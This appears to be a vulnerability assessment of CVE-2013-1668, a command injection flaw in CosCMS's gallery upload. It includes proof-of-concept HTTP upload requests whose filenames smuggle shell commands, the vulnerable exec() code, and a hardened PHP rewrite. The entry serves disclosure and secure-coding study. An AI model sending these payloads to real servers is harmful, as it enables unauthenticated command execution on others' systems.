CVE-2013-1668
Description
The uploadFile function in upload/index.php in CosCMS before 1.822 allows remote administrators to execute arbitrary commands via shell metacharacters in the name of an uploaded file.
Technical Analysis
- In fact, it doesn't seem like the user should be authenticated at all. Looking at this request:

```
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970

-----------------------------21456260222104
Content-Disposition: form-data; name="title"

1
-----------------------------21456260222104
Content-Disposition: form-data; name="image_add"

1
-----------------------------21456260222104
Content-Disposition: form-data; name="description"

1
-----------------------------21456260222104
Content-Disposition: form-data; name="tags"


-----------------------------21456260222104
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
-----------------------------21456260222104
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"

511ad0922b50f
-----------------------------21456260222104
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
Content-Type: application/octet-stream

1
-----------------------------21456260222104
Content-Disposition: form-data; name="submit"

Update
-----------------------------21456260222104--
```

According to my testing, authentication really isn't needed to reach the vulnerable code.

- Vulnerability: The vulnerability resides in modules/gallery/upload/index.php, in the uploadFile() function, where exec() is called with partially user-controlled data:

```php
$command = "mv " . $_FILES['file']['tmp_name'] . " $zip"; //die;
exec ($command, $output = array (), $res);
$command = "chmod 777 " . $zip;
exec ($command, $output = array (), $res);
$command = "unzip -o -UU " . $zip;
exec ($command, $output = array (), $res);
```

The $zip variable can be partially controlled:

```php
$zip = "/tmp/" . $_FILES['file']['name'];
```

Since $_FILES['file']['name'] is used for injection, "/" is a badchar, which makes exploitation (of something useful) really difficult:

- Execution is with www-data privileges by default, not a lot of things to do.
- You are executing from modules/gallery/upload where by default, and in the recommended installation, the user hasn't privileges for writing. So the provided PoC by htbridge doesn't work at all in a default installation:

```
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
```

You cannot write file.txt in modules/gallery/upload by default.

My PoC:

```
POST /gallery/upload/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/gallery/view/1
Content-Type: multipart/form-data; boundary=---------------------------1107861128371857341391966473
Content-Length: 360

-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="file"; filename="ls; <COMMAND>"
Content-Type: text/plain

msf.txt
-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------1107861128371857341391966473--
```
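The root cause in the Description and in the assessment above is a client-supplied filename concatenated into a shell command line. The following is an added example written for this page (it is not CosCMS code and not part of the assessment): it reproduces the vulnerable command-building pattern as pure string construction beside a hardened handler that keeps the filename away from any shell entirely. The `$_FILES` array is simulated inline with a constructed filename so the script runs from the PHP CLI; the function names `buildVulnerableCommands`, `sanitizeUploadName`, `handleUploadSafely` and `buildEscapedUnzipCommand` are this example's own.

```php
<?php
// Added example, not CosCMS code. Constructed $_FILES so the script runs from the CLI.
$_FILES = [
    'file' => [
        'name'     => '1 & ls -la > file.txt',   // constructed: the shape of name the assessment shows
        'tmp_name' => '/tmp/phpUPLOADEXAMPLE',  // constructed placeholder path
    ],
];

// Vulnerable pattern, mirroring the page's uploadFile() logic: the browser-controlled
// filename lands unescaped inside three shell command lines. Returned as strings only;
// nothing here is executed.
function buildVulnerableCommands(array $file): array
{
    $zip = "/tmp/" . $file['name'];
    return [
        "mv " . $file['tmp_name'] . " $zip",
        "chmod 777 " . $zip,
        "unzip -o -UU " . $zip,
    ];
}

// Hardened approach: reduce the name to a basename and accept only a conservative
// character set. Anything with shell metacharacters, spaces or separators is rejected
// outright rather than escaped.
function sanitizeUploadName(string $name): ?string
{
    $base = basename($name);
    // Allowlist: letters, digits, dot, underscore, hyphen; must end in .zip
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]{0,99}\.zip\z/', $base)) {
        return null;
    }
    return $base;
}

// No shell at all: move_uploaded_file() refuses paths that were not really uploaded
// via POST, ZipArchive replaces the external unzip binary, and permissions stay
// at 0640 instead of 777. Archive entries are checked for traversal before extraction.
function handleUploadSafely(array $file, string $destDir): bool
{
    $name = sanitizeUploadName($file['name']);
    if ($name === null) {
        error_log("upload rejected: invalid filename");
        return false;
    }
    $dest = $destDir . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        error_log("upload rejected: move_uploaded_file failed");
        return false;
    }
    chmod($dest, 0640);

    $zip = new ZipArchive();
    if ($zip->open($dest) !== true) {
        return false;
    }
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $entry = $zip->getNameIndex($i);
        if ($entry === '' || $entry[0] === '/' || strpos($entry, '..') !== false) {
            $zip->close();
            error_log("upload rejected: unsafe zip entry $entry");
            return false;
        }
    }
    $ok = $zip->extractTo($destDir);
    $zip->close();
    return $ok;
}

// If spawning a shell really cannot be avoided, escapeshellarg() is the minimum:
// the whole path becomes a single quoted argument and metacharacters lose meaning.
function buildEscapedUnzipCommand(string $zipPath): string
{
    return "unzip -o -UU " . escapeshellarg($zipPath);
}

// Demonstration on the constructed input
foreach (buildVulnerableCommands($_FILES['file']) as $cmd) {
    echo "vulnerable command line: $cmd\n";
}
var_dump(sanitizeUploadName($_FILES['file']['name']));  // NULL: metacharacters rejected
var_dump(sanitizeUploadName('photos-2013.zip'));         // string(15) "photos-2013.zip"
echo buildEscapedUnzipCommand("/tmp/" . $_FILES['file']['name']), "\n";
```

`handleUploadSafely()` is not invoked in the demonstration because `move_uploaded_file()` only succeeds on a genuine HTTP upload; it is the shape a web handler would take. Note that rejecting bad names is preferred over escaping them, since the same filename later reaches filesystem and archive code where shell escaping is irrelevant.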
General Information
Vendors
- coscms
Products
- coscms
- coscms 1.3
- coscms 1.41